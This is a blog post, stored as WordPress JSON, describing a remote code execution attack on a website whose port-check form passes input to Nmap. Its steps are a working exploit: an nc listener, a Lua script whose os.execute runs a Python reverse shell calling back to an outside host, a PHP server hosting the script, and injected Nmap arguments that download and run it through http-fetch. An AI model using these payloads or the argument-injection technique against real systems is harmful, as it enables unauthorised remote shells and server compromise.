{"id":182,"date":"2022-08-02T17:09:22","date_gmt":"2022-08-02T11:09:22","guid":{"rendered":"https:\/\/murat.one\/?p=182"},"modified":"2022-08-02T17:16:29","modified_gmt":"2022-08-02T11:16:29","slug":"interesting-case-with-code-execution-in-nmap","status":"publish","type":"post","link":"https:\/\/murat.one\/?p=182","title":{"rendered":"Interesting case with code execution in Nmap"},"content":{"rendered":"\n<p class=\"justifier\">A very long time ago there was an interesting case with a site for system administrators, where you could check if the port of site opened (there were two inputs for IP and port). <\/p>\n\n\n\n<p class=\"justifier\">The first thing that came to my mind was to enter in the IP:<br><strong>127.0.0.1 -h<\/strong><br>As a result, the site returned the manual page of Nmap. But many characters were filtered and it was not possible to bypass filters. After that, through many attempts, an interesting remote code execution vector was found.<\/p>\n\n\n\n<p class=\"justifier\">Nmap has a module named <a rel=\"noreferrer noopener\" href=\"https:\/\/nmap.org\/nsedoc\/scripts\/http-fetch.html\" target=\"_blank\">http-fetch<\/a> that can navigate URLs and download files. Moreover, you can even specify where to save the file. Reading documentation of Nmap to figure out how NSE scripts work, it was found that commands can be executed through the os.execute() function. So now we have all parts of puzzle.<\/p>\n\n\n\n<p>0) Open port 8888 on your server:<br><strong>nc -lvp 8888<\/strong><br>Let&#8217;s say your server IP is 1.1.1.1<\/p>\n\n\n\n<p>1) Create an index.php file on your server with the following content:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>os.execute(\"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"1.1.1.1\\\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(&#91;\\\"\/bin\/sh\\\",\\\"-i\\\"]);'\")<\/code><\/pre>\n\n\n\n<p>2) Run built-in web server of php:<br><strong>php -S 0.0.0.0:8080<\/strong><\/p>\n\n\n\n<p>3) On the victim site, instead of IP, write:<br><strong>1.1.1.1 -script http-fetch<\/strong><br>Instead of port:<br><strong>8080 -dd -script-args destination=\/tmp<\/strong><br><br>In the backend of site, something like this will run:<br><strong>nmap 1.1.1.1 -script http-fetch -p 8080 -dd -script-args destination=\/tmp<\/strong><\/p>\n\n\n\n<p class=\"justifier\">As a result of this command, the path <strong>\/tmp\/1.1.1.1\/8080\/index.html<\/strong> will contain the script from the first step.<\/p>\n\n\n\n<p class=\"justifier\">4) Run the downloaded script by entering this instead of the port:<br><strong>8080 -dd -script \/tmp\/1.1.1.1\/8080\/index.html<\/strong><\/p>\n\n\n\n<p>If everything is right, you will get backconnect to your 1.1.1.1:8888.<\/p>\n\n\n\n<p class=\"justifier\">Thus, sometimes it is not necessary to bypass filters or try to execute second command entering characters like <strong>| &amp; ;<\/strong>.<\/p>\n\n\n\n<p>Zeroday \ud83d\ude00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>About remote code execution vector in Nmap that was found in web site for system administrators.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[14],"tags":[33,18,26,17],"_links":{"self":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/182"}],"collection":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=182"}],"version-history":[{"count":3,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/182\/revisions"}],"predecessor-version":[{"id":185,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/182\/revisions\/185"}],"wp:attachment":[{"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=182"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=182"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=182"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}